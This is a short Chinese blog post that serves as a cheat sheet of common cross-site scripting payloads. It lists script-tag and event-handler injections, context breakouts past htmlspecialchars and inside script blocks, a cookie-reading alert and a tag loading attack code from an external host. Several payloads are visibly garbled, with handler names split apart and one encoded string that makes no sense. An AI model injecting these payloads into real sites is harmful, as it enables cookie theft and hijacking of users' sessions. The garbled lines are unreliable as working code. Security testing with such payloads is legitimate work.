xss之常见payload
2021/11/9 6:12:45
本文主要是介绍xss之常见payload,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
payload-有效载荷:
<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x one rror=alert(1)> #加载图形失败执行
<iframe onl oad=alert('xss')> #框架
<svg onl oad=alert(1)>
<video onl oadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onl oad=alert(1)>
<style onl oad=alert(1)></style>
<input onm ouseover=alert(1)> (简单防绕过)
#' onclick="alert(111)"> (使用DOM型的xss)
xss之htmlspecialchars方法:
1) ' onclick='alert(111)'
2) ' onm ouseover='alert(1)
3) ' onm ouseover='javascript:alert(1)'
xss之href输出:(输入的参数在herf标签中,可以使用javascript协议来执行js)
javascript:alert(1)
xss之js输出
lili'</script><script>alert("xss")</script>
对于GET和POST 方式的,随便输入,检查在标签<p>中,就可以直接用简单的payload进行注入,如:
<script>alert(1)</script>
<input onm ouseover=alert(1)>
<body onl oad=alert(1)>
URL编码:
"onmouseover="61leralertt(11) %22onmouseover%3D%2261leralertt(11)
这篇关于xss之常见payload的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-15matplotlib作图不显示3D图,怎么办?
- 2024-06-1503-Loki 日志监控
- 2024-06-1504-让LLM理解知识 -Prompt
- 2024-06-05做软件测试需要懂代码吗?
- 2024-06-0514-ShardingSphere的分布式主键实现
- 2024-06-03为什么以及如何要进行架构设计权衡?
- 2024-05-31全网首发第二弹!软考2024年5月《软件设计师》真题+解析+答案!(11-20题)
- 2024-05-31全网首发!软考2024年5月《软件设计师》真题+解析+答案!(21-30题)
- 2024-05-30【Java】百万数据excel导出功能如何实现
- 2024-05-30我们小公司,哪像华为一样,用得上IPD(集成产品开发)?